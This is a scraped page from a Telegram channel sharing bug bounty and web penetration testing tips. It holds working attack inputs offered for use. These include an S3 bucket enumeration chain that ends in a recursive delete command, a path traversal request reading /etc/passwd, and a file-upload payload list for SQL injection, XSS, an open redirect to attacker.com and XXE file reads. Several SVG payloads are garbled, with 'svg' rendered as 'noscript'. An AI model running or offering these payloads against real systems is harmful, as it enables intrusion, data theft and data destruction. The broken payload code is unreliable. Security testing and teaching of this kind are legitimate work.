Brut Security – Telegram
Brut Security
14.7K subscribers
910 photos
73 videos
287 files
967 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
Some Web Application Penetration testing or Bug Bounty notes :)

Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE
👍9🔥4
Bug Hunters Methodology v4
@Jason Haddix
👍9🔥4👎3
👩‍💻Take control of an S3 Bucket in less than a minute👩‍💻


echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon


aws s3 ls s3://REDACTEDCOM. s3. amazonaws. com
(If you still don't know the exact S3 Bucket you can use echo REDACTED.COM | cariddi -e -s -info)


aws s3 rm s3://REDACTEDCOM. s3. amazonaws. com --recursive
(It's joke, don't be a bad guy and report that...)



⚡️Happy Hacking⚡️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3
🔥6
Keep checking my old Posts to continue your learning Process!
👍9🔥31
💥Join Our Bugbounty Discussion Group 💥
🔥https://news.1rj.ru/str/brutsec🔥
🤖https://discord.gg/GZBsQMY6🤖
Please open Telegram to view this post
VIEW IN TELEGRAM
🚨 🚨 🚨 Too many people miss critical vulnerabilities because they assume a GET request can't have a body! 🚨 🚨 🚨


This is how you can send such a request using #curl :

$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET
👍9🔥43🥰1
S3 Bucket Recon Method
👍17🔥2
JWT_Hacking.pdf
226.3 KB
🔥4
Attacking_AWS.pdf
1.6 MB
🔥4
Now you can detect phishing websites quickly with Nuclei

nuclei -l websites_Possible_Phishing -tags phishing -itags phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥3👍1
🔥8
🖥Chaining Vulnerabilities through File Upload🖥

SLQi
'sleep(20).jpg
sleep(25)-- -.jpg


Path traversal
../../etc/passwd/logo.png
../../../logo.png


XSS
->  Set file name filename="noscript onload=alert(document.domain)>" , filename="58832_300x300.jpg<noscript onload=confirm()>"

-> Upload using .gif file
GIF89a/<noscript/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .noscript file
<noscript xmlns="w3.org/2000/noscript" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE noscript PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><noscript version="1.1" baseProfile="full" xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<noscript type="text/javanoscript">
alert("HolyBugx XSS");
</noscript>
</noscript>


Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<noscript
onload="window.location='attacker.com'"
xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</noscript>
</code>

XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<noscript width="500px" height="500px" xmlns="w3.org/2000/noscript" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</noscript>
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍6🔥1
Blind SQL Injection Detection and Exploitation (Cheat Sheet)
👎4🔥2😁1
1711031051425.jpg
1.4 MB
🔥41